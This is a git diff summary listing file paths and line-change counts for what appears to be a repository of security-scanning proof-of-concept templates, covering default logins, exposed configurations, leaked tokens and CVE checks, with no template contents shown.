poc/auth/kasm-login-panel.yaml | 49 +
poc/auth/keenetic-web-login-8442.yaml | 19 +
poc/auth/keenetic-web-login-8443.yaml | 22 -
poc/auth/kenesto-login-8445.yaml | 4 +
poc/auth/kentico-login-8446.yaml | 23 -
poc/auth/kentico-login.yaml | 22 +-
poc/auth/key-cloak-admin-panel.yaml | 4 +
...json-8472.yaml => keycloak-json-8473.yaml} | 0
poc/auth/keycloak-json-8474.yaml | 5 +-
poc/auth/keycloak-openid-config-8475.yaml | 39 -
poc/auth/keycloak-openid-config.yaml | 25 +
poc/auth/keycloak-xss-8481.yaml | 5 +-
poc/auth/keycloak-xss-8482.yaml | 9 +-
poc/auth/kiwitcms-login-8496.yaml | 11 +-
...-unauth.yaml => kubernetes-unauth(1).yaml} | 0
poc/auth/lansweeper-login.yaml | 37 +-
poc/auth/linksys-wifi-login.yaml | 21 +-
poc/auth/lucee-login-8662.yaml | 3 +
poc/auth/lucee-login-8664.yaml | 4 +-
poc/auth/lucee-login-8665.yaml | 24 -
poc/auth/lutron-iot-default-login-8675.yaml | 27 +
poc/auth/lutron-iot-default-login-8676.yaml | 6 +
poc/auth/lutron-iot-default-login-8678.yaml | 31 -
poc/auth/lutron-iot-default-login.yaml | 7 +-
poc/auth/mailchimp-api-key-8722.yaml | 20 +-
poc/auth/mailchimp-api-key-8726.yaml | 20 -
.../mantisbt-default-credential-8778.yaml | 59 +-
poc/auth/meshcentral-login-8801.yaml | 21 -
poc/auth/meshcentral-login-8803.yaml | 21 +
poc/auth/mongodb-unauth-8925.yaml | 22 -
poc/auth/mongodb-unauth-8928.yaml | 15 +-
poc/auth/mysql-native-password-8981.yaml | 5 +-
poc/auth/mysql-native-password.yaml | 21 +-
poc/auth/nagios-default-login-8990.yaml | 44 +
poc/auth/nagios-default-login-8994.yaml | 31 -
poc/auth/netgear-router-auth-bypass-9025.yaml | 28 -
poc/auth/netgear-router-auth-bypass.yaml | 28 +
poc/auth/netscaler-aaa-login.yaml | 21 +-
poc/auth/netsus-default-login-9060.yaml | 46 -
poc/auth/netsus-default-login.yaml | 33 +
poc/auth/netsus-server-login-9061.yaml | 20 +
poc/auth/netsus-server-login-9062.yaml | 20 -
poc/auth/nexus-default-login-9088.yaml | 11 +-
poc/auth/nexus-default-login-9089.yaml | 16 +-
poc/auth/nps-default-login-9145.yaml | 54 -
poc/auth/nuuno-network-login-9164.yaml | 20 +
...gin-9162.yaml => nuuno-network-login.yaml} | 0
poc/auth/oauth-access-key-9186.yaml | 22 +
poc/auth/oauth2-detect-9181.yaml | 32 -
poc/auth/oauth2-detect-9182.yaml | 51 +-
poc/auth/octobercms-default-login-9192.yaml | 65 -
poc/auth/octobercms-default-login.yaml | 59 +
poc/auth/ofbiz-default-credentials.yaml | 4 +-
poc/auth/ofbiz-default-login-9210.yaml | 40 -
poc/auth/ofbiz-default-login-9211.yaml | 9 +
poc/auth/open-stack-dashboard-login-9321.yaml | 21 +
poc/auth/open-stack-dashboard-login-9322.yaml | 22 -
poc/auth/open-stack-dashboard-login-9323.yaml | 2 +-
poc/auth/openemr-default-login-9270.yaml | 6 +-
poc/auth/openemr-default-login.yaml | 43 -
poc/auth/openwrt-default-login.yaml | 13 +-
poc/auth/oracle-opera-login.yaml | 38 +
poc/auth/panabit-default-login-9438.yaml | 12 +-
poc/auth/panabit-default-login-9440.yaml | 26 +-
.../panabit-ixcache-default-login-9443.yaml | 14 +-
poc/auth/panabit-ixcache-default-login.yaml | 30 +
poc/auth/panos-default-login-9454.yaml | 18 +-
poc/auth/panos-default-login-9455.yaml | 34 +
poc/auth/panos-default-login.yaml | 42 +
poc/auth/paypal-braintree-token(1).yaml | 16 +
poc/auth/paypal-braintree-token-11856.yaml | 13 -
poc/auth/paypal-braintree-token.yaml | 4 -
poc/auth/pentaho-default-login-9477.yaml | 14 +-
poc/auth/pentaho-default-login-9478.yaml | 33 -
poc/auth/pentaho-default-login-9480.yaml | 42 +
poc/auth/phabricator-login.yaml | 20 +-
poc/auth/pictatic-api-key-9576.yaml | 5 +-
poc/auth/pictatic-api-key.yaml | 4 -
poc/auth/pieregister-open-redirect-9577.yaml | 13 +-
poc/auth/pieregister-open-redirect-9579.yaml | 4 +-
.../pieregister-plugin-open-redirect.yaml | 10 +-
poc/auth/pinpoint-unauth-9588.yaml | 13 +-
poc/auth/pinpoint-unauth-9590.yaml | 27 -
poc/auth/plastic-scm-login.yaml | 19 +-
poc/auth/polycom-login-9625.yaml | 20 -
poc/auth/polycom-login-9627.yaml | 21 +
poc/auth/polycom-login.yaml | 19 +-
poc/auth/possible-AEM-secrets.yaml | 46 -
poc/auth/private-key-9655.yaml | 3 -
poc/auth/project-insight-login.yaml | 18 +-
poc/auth/pure-storage-login.yaml | 18 +-
...=> putty-private-key-disclosure-9730.yaml} | 0
poc/auth/r-webserver-login.yaml | 22 +-
poc/auth/rabbitmq-default-login-9783.yaml | 12 +-
poc/auth/rabbitmq-default-login-9786.yaml | 12 +-
.../rails-secret-token-disclosure-9809.yaml | 22 -
.../rails-secret-token-disclosure-9810.yaml | 23 +
poc/auth/rails-secret-token-disclosure.yaml | 3 +-
poc/auth/rainloop-default-login-9811.yaml | 19 +-
poc/auth/rainloop-default-login.yaml | 44 +
poc/auth/rancher-default-login-9814.yaml | 11 +-
poc/auth/rancher-default-login-9815.yaml | 12 +-
poc/auth/ranger-default-login-9827.yaml | 39 +
poc/auth/ranger-default-login-9828.yaml | 15 +-
poc/auth/ricoh-weak-password-9880.yaml | 9 +-
poc/auth/ricoh-weak-password-9882.yaml | 11 +-
poc/auth/rockmongo-default-login-9897.yaml | 47 +
poc/auth/rockmongo-default-login-9899.yaml | 11 +-
...gin-9908.yaml => routeros-login-9909.yaml} | 0
poc/auth/routeros-login.yaml | 25 -
poc/auth/rseenet-default-login-9913.yaml | 9 +
poc/auth/rseenet-default-login-9914.yaml | 6 +-
poc/auth/ruijie-eg-password-leak-9922.yaml | 39 -
poc/auth/ruijie-eg-password-leak.yaml | 8 +-
poc/auth/saferoads-vms-login-9971.yaml | 17 -
poc/auth/saferoads-vms-login-9973.yaml | 16 +
poc/auth/saferoads-vms-login.yaml | 18 +-
.../samsung-wlan-default-login-10018.yaml | 45 +
poc/auth/sangfor-edr-auth-bypass-10022.yaml | 33 +-
poc/auth/sangfor-edr-auth-bypass.yaml | 29 -
...gin-10089.yaml => sauter-login-10091.yaml} | 0
poc/auth/sauter-login.yaml | 22 +-
poc/auth/seats-login-10104.yaml | 19 -
poc/auth/seats-login.yaml | 3 +-
poc/auth/seeddms-default-login-10125.yaml | 16 +-
poc/auth/seeddms-default-login-10127.yaml | 20 +-
poc/auth/sendgrid-api-key-10140.yaml | 2 +-
poc/auth/sequoiadb-default-login-10150.yaml | 17 +-
poc/auth/server-backup-login-10153.yaml | 19 +
poc/auth/server-backup-login-10156.yaml | 20 -
poc/auth/server-backup-login.yaml | 24 +-
...server-backup-manager-se-login-detect.yaml | 25 +-
...ervice-pwd.yaml => service-pwd-10176.yaml} | 0
poc/auth/service-pwd-10178.yaml | 16 +-
poc/auth/servicedesk-login-panel-10172.yaml | 22 -
poc/auth/servicedesk-login-panel.yaml | 15 +-
poc/auth/sgp-login-panel-10182.yaml | 3 +-
poc/auth/sgp-login-panel.yaml | 21 +-
poc/auth/sharecenter-login-10190.yaml | 1 +
poc/auth/shopify-custom-token(1).yaml | 16 +
poc/auth/shopify-custom-token-10198.yaml | 13 -
poc/auth/shopify-custom-token-11860.yaml | 5 +-
poc/auth/shopify-private-token-11861.yaml | 16 -
poc/auth/shopify-private-token.yaml | 5 +-
poc/auth/shoppable-token-10206.yaml | 5 +-
poc/auth/shoppable-token-10209.yaml | 16 +
poc/auth/shoppable-token.yaml | 16 +
poc/auth/showdoc-default-login-10221.yaml | 14 +-
...10298.yaml => sitefinity-login-10297.yaml} | 0
poc/auth/sitefinity-login.yaml | 12 +-
poc/auth/siteomat-login-10300.yaml | 19 -
poc/auth/siteomat-login-10301.yaml | 19 +
poc/auth/siteomat-login-10303.yaml | 3 +-
poc/auth/slack-bot-token-10310.yaml | 5 +-
poc/auth/slack-bot-token-10312.yaml | 18 +
poc/auth/slocum-login-10317.yaml | 4 +
poc/auth/slocum-login.yaml | 17 +-
poc/auth/smartsense-default-login-10330.yaml | 12 +-
poc/auth/smartsense-default-login-10331.yaml | 9 +-
poc/auth/solar-log-authbypass-10352.yaml | 39 -
poc/auth/solar-log-authbypass.yaml | 27 +
poc/auth/solarwinds-default-login-10355.yaml | 47 -
poc/auth/solarwinds-default-login-10356.yaml | 16 +-
poc/auth/somfy-login-10371.yaml | 18 +
poc/auth/somfy-login-10373.yaml | 18 -
poc/auth/sonarqube-token-10380.yaml | 15 -
poc/auth/sonarqube-token-10382.yaml | 9 +-
poc/auth/spark-webui-unauth-10401.yaml | 26 +
poc/auth/spark-webui-unauth.yaml | 15 +-
poc/auth/sphider-login-10407.yaml | 22 -
poc/auth/sphider-login-10408.yaml | 4 +-
poc/auth/sphider-login-10409.yaml | 21 +
poc/auth/sphider-login.yaml | 23 +-
poc/auth/splunk-enterprise-login-panel.yaml | 23 +-
poc/auth/splunk-enterprise-login-panel.yml | 22 -
poc/auth/splunk-login-10416.yaml | 24 +
poc/auth/square-access-token(1).yaml | 17 -
poc/auth/square-access-token-11867.yaml | 14 +
poc/auth/square-access-token.yaml | 3 +
poc/auth/ssh-authorized-keys-10523.yaml | 22 +-
.../stem-audio-table-private-keys-10535.yaml | 22 +
.../stem-audio-table-private-keys-10536.yaml | 27 -
poc/auth/stem-audio-table-private-keys.yaml | 9 +-
poc/auth/stripe-api-key(1).yaml | 16 +
poc/auth/stripe-api-key-11869.yaml | 13 -
poc/auth/stripe-restricted-key-10553.yaml | 2 +-
poc/auth/stripe-restricted-key.yaml | 15 +
poc/auth/submitty-login-10568.yaml | 31 -
poc/auth/submitty-login.yaml | 15 +-
poc/auth/supermicro-default-login-10572.yaml | 11 +-
poc/auth/supermicro-default-login.yaml | 36 +
poc/auth/superset-default-login-10574.yaml | 13 +-
poc/auth/superset-default-login.yaml | 8 +
poc/auth/symantec-dlp-login-10596.yaml | 21 -
...601.yaml => symantec-epm-login-10599.yaml} | 0
poc/auth/symantec-ewep-login-10605.yaml | 7 +-
poc/auth/symantec-ewep-login-10606.yaml | 3 +-
poc/auth/szhe-default-login-10636.yaml | 10 +-
...gin.yaml => szhe-default-login-10638.yaml} | 0
.../telecom-gateway-default-login-10686.yaml | 14 +-
poc/auth/telecom-gateway-default-login.yaml | 33 +
poc/auth/tidb-unauth-10770.yaml | 23 +
poc/auth/tidb-unauth-10772.yaml | 26 -
poc/auth/tomcat-default-login-10791.yaml | 2 +-
poc/auth/tomcat-default-login.yaml | 76 +
poc/auth/tracer-sc-login.yaml | 21 +-
poc/auth/twitter-secret-10862.yaml | 3 +-
poc/auth/twitter-secret.yaml | 4 +
poc/auth/ucmdb-default-login-10868.yaml | 3 +-
poc/auth/ucmdb-default-login-10871.yaml | 41 +
...in-10869.yaml => ucmdb-default-login.yaml} | 0
poc/auth/unauth-ftp-10939.yaml | 13 +-
poc/auth/unauth-ftp-10942.yaml | 18 -
poc/auth/unauth-hoteldruid-panel-10943.yaml | 39 -
poc/auth/unauth-hoteldruid-panel.yaml | 25 +
poc/auth/unauth-message-read-10947.yaml | 37 +-
poc/auth/unauth-spark-api-10963.yaml | 14 +-
poc/auth/unauth-spark-api.yaml | 30 -
poc/auth/unauth-wavink-panel-10967.yaml | 48 +
poc/auth/unauth-xproxy-dashboard-10968.yaml | 23 -
poc/auth/unauth-xproxy-dashboard-10969.yaml | 27 +
poc/auth/unauth-xproxy-dashboard.yaml | 4 -
poc/auth/unauthenticated-airflow-10884.yaml | 27 +
poc/auth/unauthenticated-airflow-10886.yaml | 23 -
poc/auth/unauthenticated-airflow.yaml | 12 +-
.../unauthenticated-alert-manager-10888.yaml | 3 +-
.../unauthenticated-alert-manager-10892.yaml | 23 -
poc/auth/unauthenticated-frp-10895.yaml | 21 +
poc/auth/unauthenticated-frp-10896.yaml | 5 +
poc/auth/unauthenticated-frp-10897.yaml | 26 -
poc/auth/unauthenticated-glowroot-10900.yaml | 13 +-
poc/auth/unauthenticated-glowroot-10902.yaml | 8 +-
poc/auth/unauthenticated-influxdb-10903.yaml | 27 +
poc/auth/unauthenticated-influxdb.yaml | 6 +-
poc/auth/unauthenticated-jenkins.yaml | 50 +-
poc/auth/unauthenticated-mongo-express.yaml | 23 +
.../unauthenticated-nacos-access-10912.yaml | 40 +
.../unauthenticated-nacos-access-10915.yaml | 35 -
poc/auth/unauthenticated-nacos-access.yaml | 6 +
poc/auth/unauthenticated-netdata.yaml | 11 +-
.../unauthenticated-popup-upload-10921.yaml | 21 +
...yaml => unauthenticated-popup-upload.yaml} | 0
poc/auth/unauthenticated-prtg-10924.yaml | 20 -
poc/auth/unauthenticated-prtg-10927.yaml | 21 +
poc/auth/unauthenticated-zipkin.yaml | 26 -
poc/auth/unauthenticated-zippkin.yaml | 5 +
.../unauthorized-h3csecparh-login-10948.yaml | 34 -
poc/auth/unauthorized-h3csecparh-login.yaml | 29 +
poc/auth/unauthorized-hp-printer-10951.yaml | 20 +
poc/auth/unauthorized-plastic-scm-10956.yaml | 17 +-
poc/auth/unauthorized-plastic-scm-10957.yaml | 49 -
...ized-puppet-node-manager-detect-10958.yaml | 20 +
...ized-puppet-node-manager-detect-10959.yaml | 24 -
...authorized-puppet-node-manager-detect.yaml | 9 +-
poc/auth/versa-default-login-11003.yaml | 21 +-
poc/auth/versa-default-login-11004.yaml | 29 +-
poc/auth/vidyo-default-login-11009.yaml | 52 -
...in.yaml => vidyo-default-login-11010.yaml} | 0
poc/auth/vigor-login-11020.yaml | 19 +
poc/auth/vigor-login-11023.yaml | 20 -
poc/auth/vigor-login.yaml | 19 +-
poc/auth/visionhub-default-login-11026.yaml | 42 +
poc/auth/visionhub-default-login-11027.yaml | 12 +-
poc/auth/vpms-auth-bypass-11066.yaml | 33 +
poc/auth/vpms-auth-bypass-11068.yaml | 32 -
...tchguard-credentials-disclosure-11107.yaml | 16 +-
...=> watchguard-credentials-disclosure.yaml} | 0
poc/auth/weblogic-weak-login-11154.yaml | 68 -
poc/auth/weblogic-weak-login-11155.yaml | 14 +-
poc/auth/whm-login-detect.yaml | 22 +-
poc/auth/wifisky-default-password-11205.yaml | 38 -
poc/auth/wifisky-default-password.yaml | 16 +-
...ordpress-infinitewp-auth-bypass-11287.yaml | 21 +-
...ordpress-infinitewp-auth-bypass-11288.yaml | 60 -
poc/auth/wordpress-login.yaml | 16 +-
poc/auth/wordpress-updraftplus-pem-key.yaml | 12 +-
.../wordpress-weak-credentials-11336.yaml | 43 +
.../wordpress-weak-credentials-11337.yaml | 37 -
poc/auth/wordpress-weak-credentials.yaml | 17 +-
poc/auth/wpdm-cache-session-11436.yaml | 23 +
poc/auth/wpdm-cache-session-11438.yaml | 24 -
poc/auth/wso2-default-login.yaml | 38 -
poc/auth/xenforo-login-11674.yaml | 17 -
poc/auth/xenmobile-login-11675.yaml | 19 +
poc/auth/xenmobile-login-11677.yaml | 20 -
poc/auth/xenmobile-login.yaml | 19 +-
poc/auth/xerox7-default-login-11679.yaml | 21 +-
poc/auth/xerox7-default-login.yaml | 46 +
poc/auth/xvr-login-11704.yaml | 8 +-
poc/auth/xvr-login-11705.yaml | 20 +
poc/auth/xxljob-default-login-11709.yaml | 53 -
poc/auth/xxljob-default-login-11712.yaml | 16 +-
poc/auth/zabbix-default-credentials.yaml | 7 +-
poc/auth/zabbix-server-login-11767.yaml | 3 +-
poc/auth/zabbix-server-login-11769.yaml | 23 +
poc/auth/zeroshell-login-11788.yaml | 20 +
poc/auth/zeroshell-login-11790.yaml | 20 -
poc/auth/zeroshell-login.yaml | 18 +-
poc/auth/zhiyuan-oa-session-leak-11802.yaml | 22 +
...1801.yaml => zhiyuan-oa-session-leak.yaml} | 0
poc/auth/zhiyuan-oa-unauthorized-11806.yaml | 25 +
poc/auth/zhiyuan-oa-unauthorized-11808.yaml | 26 -
poc/auth/zimbra-preauth-ssrf-11810.yaml | 14 +-
poc/auth/zimbra-preauth-ssrf.yaml | 20 +
poc/auth/zms-auth-bypass-11830.yaml | 33 +
poc/auth/zms-auth-bypass-11832.yaml | 34 -
poc/auth/zoho-webhook-token-11835.yaml | 2 +-
poc/aws/amazon-docker-config-280.yaml | 28 -
.../amazon-docker-config-disclosure-278.yaml | 18 -
poc/aws/amazon-docker-config-disclosure.yaml | 12 +-
poc/aws/amazon-docker-config.yaml | 18 +
poc/aws/amazon-mws-auth-token-11845.yaml | 11 +-
poc/aws/amazon-mws-auth-token-282.yaml | 6 +-
poc/aws/amazon-mws-auth-token-283.yaml | 11 +-
poc/aws/aws-access-id-618.yaml | 16 -
poc/aws/aws-access-id-620.yaml | 16 -
poc/aws/aws-access-id.yaml | 11 +-
poc/aws/aws-access-key-value-624.yaml | 22 +
poc/aws/aws-bucket-service-628.yaml | 31 -
poc/aws/aws-bucket-service.yaml | 27 +
poc/aws/aws-cloudfront-service-634.yaml | 14 +-
poc/aws/aws-cloudfront-service-635.yaml | 22 -
poc/aws/aws-cognito-638.yaml | 32 -
.../aws-ecs-container-agent-tasks-641.yaml | 25 -
poc/aws/aws-elastic-beanstalk-detect-644.yaml | 7 +-
poc/aws/aws-elastic-beanstalk-detect.yaml | 31 -
poc/aws/aws-object-listing-646.yaml | 3 +-
poc/aws/aws-object-listing.yaml | 11 +-
poc/aws/aws-opensearch-login-649.yaml | 24 +
poc/aws/aws-opensearch-login-650.yaml | 25 -
poc/aws/aws-opensearch-login.yaml | 3 +-
poc/aws/aws-redirect-651.yaml | 24 +
poc/aws/aws-redirect-652.yaml | 13 +-
poc/aws/awstats-config-656.yaml | 36 +
poc/aws/awstats-config.yaml | 26 -
poc/aws/awstats-script-657.yaml | 29 +
poc/aws/awstats-script-658.yaml | 29 -
poc/aws/awstats-script.yaml | 20 +-
poc/aws/ec2-detection-7162.yaml | 18 -
poc/aws/ec2-detection-7163.yaml | 24 +
poc/aws/metadata-aws-8812.yaml | 26 +-
poc/aws/metadata-aws.yaml | 41 -
poc/aws/s3-bucket.yaml | 4 +
poc/aws/s3-detect-9964.yaml | 19 +-
poc/aws/s3-subtakeover-9968.yaml | 20 -
poc/aws/s3-subtakeover-9969.yaml | 24 +
poc/backup/adb-backup-enabled-60.yaml | 15 +-
poc/backup/db-backup-lfi-6774.yaml | 25 -
poc/backup/db-backup-lfi-6775.yaml | 30 +
poc/backup/db-backup-lfi-6776.yaml | 11 +-
poc/backup/db-backup-lfi.yaml | 4 -
...s-9497.yaml => php-backup-files-9498.yaml} | 0
poc/backup/php-backup-files.yaml | 127 +-
poc/backup/server-backup-login-10153.yaml | 19 +
poc/backup/server-backup-login-10156.yaml | 20 -
poc/backup/server-backup-login.yaml | 24 +-
.../server-backup-manager-se-10157.yaml | 19 -
.../server-backup-manager-se-10160.yaml | 20 +
...server-backup-manager-se-login-detect.yaml | 25 +-
...s-total-upkeep-backup-download-11324.yaml} | 0
...ordpress-total-upkeep-backup-download.yaml | 13 +-
poc/backup/zip-backup-files-11818.yaml | 99 +-
poc/cisco/cisco-ace-device-manager.yaml | 16 +-
.../cisco-cloudcenter-suite-log4j-rce.yaml | 63 -
poc/cisco/cisco-cloudcenter-suite-rce.yaml | 73 +
poc/cisco/cisco-edge-340.yaml | 16 +-
poc/cisco/cisco-finesse-login-938.yaml | 22 -
poc/cisco/cisco-finesse-login-940.yaml | 23 +
poc/cisco/cisco-integrated-login-941.yaml | 3 +-
poc/cisco/cisco-meraki-exposure-944.yaml | 25 +
poc/cisco/cisco-meraki-exposure-946.yaml | 26 -
poc/cisco/cisco-network-config-949.yaml | 34 -
poc/cisco/cisco-network-config.yaml | 24 +
poc/cisco/cisco-prime-infrastructure-952.yaml | 26 -
poc/cisco/cisco-prime-infrastructure-954.yaml | 26 +
poc/cisco/cisco-sd-wan-955.yaml | 25 +
poc/cisco/cisco-sd-wan-957.yaml | 26 -
poc/cisco/cisco-secure-desktop-962.yaml | 27 -
poc/cisco/cisco-security-details-963.yaml | 22 -
poc/cisco/cisco-security-details.yaml | 2 +-
poc/cisco/cisco-smi-exposure-970.yaml | 14 +-
...e-972.yaml => cisco-smi-exposure-971.yaml} | 0
poc/cisco/cisco-systems-login-973.yaml | 25 +
poc/cisco/cisco-systems-login-975.yaml | 32 -
poc/cisco/cisco-systems-login.yaml | 12 +-
poc/cisco/cisco-telepresence-976.yaml | 25 +
poc/cisco/cisco-telepresence-978.yaml | 25 -
poc/cisco/cisco-telepresence.yaml | 4 +-
...-980.yaml => cisco-ucs-kvm-login-979.yaml} | 0
poc/cisco/cisco-ucs-kvm-login.yaml | 13 +-
.../adobe-coldfusion-detect-82.yaml | 62 -
.../adobe-coldfusion-detect-83.yaml | 9 +-
.../adobe-coldfusion-error-detect-86.yaml | 29 +
...aml => adobe-coldfusion-error-detect.yaml} | 0
.../coldfusion-administrator-login-1145.yaml | 49 +-
poc/coldfusion/coldfusion-debug-xss-1153.yaml | 31 +
poc/coldfusion/coldfusion-debug-xss.yaml | 34 -
.../unpatched-coldfusion-10979.yaml | 30 +
poc/coldfusion/unpatched-coldfusion.yaml | 2 -
poc/config/aerohive-netconfig-ui-199.yaml | 73 +-
...ui.yaml => aerohive-netconfig-ui-200.yaml} | 0
.../airflow-configuration-exposure-230.yaml | 28 +
.../airflow-configuration-exposure.yaml | 16 -
poc/config/amazon-docker-config-280.yaml | 28 -
.../amazon-docker-config-disclosure-278.yaml | 18 -
.../amazon-docker-config-disclosure.yaml | 12 +-
poc/config/amazon-docker-config.yaml | 18 +
poc/config/ansible-config-disclosure-326.yaml | 28 +
poc/config/ansible-config-disclosure.yaml | 16 -
poc/config/api-iconfinder-439.yaml | 34 +
poc/config/awstats-config-656.yaml | 36 +
poc/config/awstats-config.yaml | 26 -
.../bigip-config-utility-detect-730.yaml | 34 +
.../bigip-config-utility-detect-731.yaml | 2 +-
.../bigip-config-utility-detect-732.yaml | 42 +
poc/config/buffalo-config-injection-798.yaml | 30 -
poc/config/buffalo-config-injection-800.yaml | 34 +
poc/config/buffalo-config-injection-801.yaml | 39 +
poc/config/buffalo-config-injection.yaml | 6 +-
poc/config/circleci-config-923.yaml | 35 +
poc/config/circleci-config-925.yaml | 3 +-
poc/config/cisco-network-config-949.yaml | 34 -
poc/config/cisco-network-config.yaml | 24 +
poc/config/config-rb-1179.yaml | 30 +
.../{config-rb-1180.yaml => config-rb.yaml} | 0
poc/config/configuration-listing-1182.yaml | 61 +-
poc/config/confluence-detect-1186.yaml | 14 +-
poc/config/confluence-detect-1187.yaml | 40 -
poc/config/confluence-detect-1189.yaml | 41 +
.../confluence-ssrf-sharelinks-1191.yaml | 31 +-
.../confluence-ssrf-sharelinks-1192.yaml | 44 +
.../confluence-ssrf-sharelinks-1193.yaml | 36 -
poc/config/cors-misconfig-1223.yaml | 44 +
poc/config/detect-drone-config-6972.yaml | 7 +-
poc/config/detect-drone-config-6973.yaml | 2 +-
poc/config/docker-compose-config-7059.yaml | 27 -
poc/config/docker-compose-config.yaml | 26 +
poc/config/dockercfg-config-7056.yaml | 6 -
poc/config/dockercfg-config.yaml | 26 -
poc/config/esmtprc-config-7258.yaml | 10 +-
poc/config/esmtprc-config-7259.yaml | 11 +-
poc/config/firebase-config-exposure.yaml | 30 -
poc/config/front-page-misconfig-7547.yaml | 25 +
.../{ftpconfig.yaml => ftpconfig-7565.yaml} | 0
poc/config/ftpconfig-7566.yaml | 13 +-
poc/config/git-config-7635.yaml | 14 +
poc/config/git-config-7636.yaml | 19 +-
...l => git-config-nginxoffbyslash-7628.yaml} | 0
.../git-config-nginxoffbyslash-7630.yaml | 35 +
poc/config/github-page-config-7654.yaml | 30 +
.../gocd-cruise-configuration-7748.yaml | 27 -
.../grandstream-device-configuration.yaml | 9 +-
....yaml => honeywell-scada-config-7990.yaml} | 0
poc/config/honeywell-scada-config-7992.yaml | 25 -
poc/config/htaccess-config-8043.yaml | 26 +
poc/config/httpd-config-8055.yaml | 34 +
poc/config/httpd-config.yaml | 24 -
poc/config/joomla-config-file-8376.yaml | 10 +-
poc/config/joomla-config-file-8377.yaml | 12 +-
poc/config/keycloak-openid-config-8475.yaml | 39 -
poc/config/keycloak-openid-config.yaml | 25 +
poc/config/magento-config-disclosure.yaml | 50 -
...02.yaml => misconfigured-docker-8900.yaml} | 0
poc/config/misconfigured-docker.yaml | 10 +-
poc/config/msmtp-config-8967.yaml | 42 +
poc/config/nginx-config-9098.yaml | 26 +-
...inx-config.yaml => nginx-config-9099.yaml} | 0
poc/config/parameters-config-9465.yaml | 38 -
poc/config/parameters-config.yaml | 32 +
poc/config/prometheus-config-9673.yaml | 37 +
poc/config/prometheus-config-endpoint.yaml | 19 +-
poc/config/prometheus-config.yaml | 27 -
poc/config/rconfig-rce-9834.yaml | 20 +-
poc/config/samba-config-9987.yaml | 34 -
poc/config/samba-config.yaml | 20 +
poc/config/springboot-autoconfig.yaml | 25 -
poc/config/springboot-configprops-10442.yaml | 42 +
poc/config/symfony-database-config-10615.yaml | 13 +-
poc/config/symfony-database-config-10616.yaml | 17 -
...aml => symfony-database-config-10617.yaml} | 0
poc/config/tcpconfig.yaml | 19 +
poc/config/tugboat-config-exposure-10842.yaml | 32 -
...aml => tugboat-config-exposure-10843.yaml} | 0
.../wamp-server-configuration-11096.yaml | 20 -
poc/config/web-config-11125.yaml | 24 -
.../wordpress-accessible-wpconfig-11235.yaml | 38 -
.../wordpress-accessible-wpconfig-11238.yaml | 12 +-
poc/config/wordpress-git-config-11278.yaml | 26 -
poc/config/wordpress-git-config-11279.yaml | 16 +-
poc/config/wp-config-setup.yaml | 15 +-
poc/config/wpengine-config-check.yaml | 22 -
poc/config/zend-config-file-11778.yaml | 37 +
poc/config/zend-config-file-11779.yaml | 22 -
poc/crlf_injection/crlf-injection-1262.yaml | 29 +
poc/crlf_injection/crlf-injection-1263.yaml | 6 +-
poc/crlf_injection/crlf-injection-1264.yaml | 51 +-
.../csrfguard-detect-1291.yaml | 17 +-
...detect-1290.yaml => csrfguard-detect.yaml} | 0
poc/cve/CNVD-2020-23735.yaml | 23 +-
poc/cve/CNVD-2020-56167.yaml | 20 +-
poc/cve/CNVD-2021-14536.yaml | 13 +-
poc/cve/CNVD-2021-17369.yaml | 11 +-
poc/cve/CNVD-2021-26422.yaml | 29 +
poc/cve/CNVD-2021-30167.yaml | 22 +-
poc/cve/CVE-2000-0114.yaml | 28 +-
poc/cve/CVE-2002-1131.yaml | 35 +-
poc/cve/CVE-2007-4504.yaml | 5 -
poc/cve/CVE-2008-6222.yaml | 29 +-
poc/cve/CVE-2008-6668.yaml | 37 +-
poc/cve/CVE-2009-1151.yaml | 32 +-
poc/cve/CVE-2009-1496.yaml | 29 +-
poc/cve/CVE-2009-2015.yaml | 28 +-
poc/cve/CVE-2009-2100.yaml | 12 +-
poc/cve/CVE-2009-3053.yaml | 28 +-
poc/cve/CVE-2010-0943.yaml | 28 +-
poc/cve/CVE-2010-0972.yaml | 24 +-
poc/cve/CVE-2010-0982.yaml | 26 +-
poc/cve/CVE-2010-1056.yaml | 28 +-
poc/cve/CVE-2010-1302.yaml | 2 -
poc/cve/CVE-2010-1305.yaml | 8 +-
poc/cve/CVE-2010-1307.yaml | 8 +-
poc/cve/CVE-2010-1308.yaml | 24 +-
poc/cve/CVE-2010-1312.yaml | 27 +-
poc/cve/CVE-2010-1313.yaml | 27 +-
poc/cve/CVE-2010-1314.yaml | 25 +-
poc/cve/CVE-2010-1315.yaml | 26 +-
poc/cve/CVE-2010-1345.yaml | 28 +-
poc/cve/CVE-2010-1352.yaml | 25 +-
poc/cve/CVE-2010-1353.yaml | 4 +-
poc/cve/CVE-2010-1469.yaml | 24 +-
poc/cve/CVE-2010-1470.yaml | 24 +-
poc/cve/CVE-2010-1474.yaml | 28 +-
poc/cve/CVE-2010-1491.yaml | 26 +-
poc/cve/CVE-2010-1494.yaml | 26 +-
poc/cve/CVE-2010-1532.yaml | 25 +-
poc/cve/CVE-2010-1540.yaml | 6 +-
poc/cve/CVE-2010-1657.yaml | 15 +-
poc/cve/CVE-2010-1658.yaml | 27 +-
poc/cve/CVE-2010-1659.yaml | 4 +-
poc/cve/CVE-2010-1714.yaml | 28 +-
poc/cve/CVE-2010-1715.yaml | 27 +-
poc/cve/CVE-2010-1717.yaml | 25 +-
poc/cve/CVE-2010-1718.yaml | 27 +-
poc/cve/CVE-2010-1858.yaml | 26 +-
poc/cve/CVE-2010-1953.yaml | 27 +-
poc/cve/CVE-2010-1981.yaml | 26 +-
poc/cve/CVE-2010-1982.yaml | 26 +-
poc/cve/CVE-2010-2682.yaml | 25 +-
poc/cve/CVE-2010-2920.yaml | 25 +-
poc/cve/CVE-2010-3203.yaml | 24 +-
poc/cve/CVE-2010-4239.yaml | 33 +-
poc/cve/CVE-2010-4617.yaml | 25 +-
poc/cve/CVE-2010-5028.yaml | 27 +-
poc/cve/CVE-2010-5278.yaml | 36 +-
poc/cve/CVE-2011-2744.yaml | 27 +-
poc/cve/CVE-2011-3315.yaml | 28 +-
poc/cve/CVE-2012-0896.yaml | 4 +-
poc/cve/CVE-2012-0981.yaml | 26 +-
poc/cve/CVE-2012-4273.yaml | 30 +-
poc/cve/CVE-2012-4768.yaml | 30 +-
poc/cve/CVE-2013-5528.yaml | 23 +-
poc/cve/CVE-2013-5979.yaml | 5 -
poc/cve/CVE-2013-6281.yaml | 33 +-
poc/cve/CVE-2013-7240.yaml | 26 +-
poc/cve/CVE-2014-1203.yaml | 22 +-
poc/cve/CVE-2014-2962.yaml | 30 +-
poc/cve/CVE-2014-4561.yaml | 26 +-
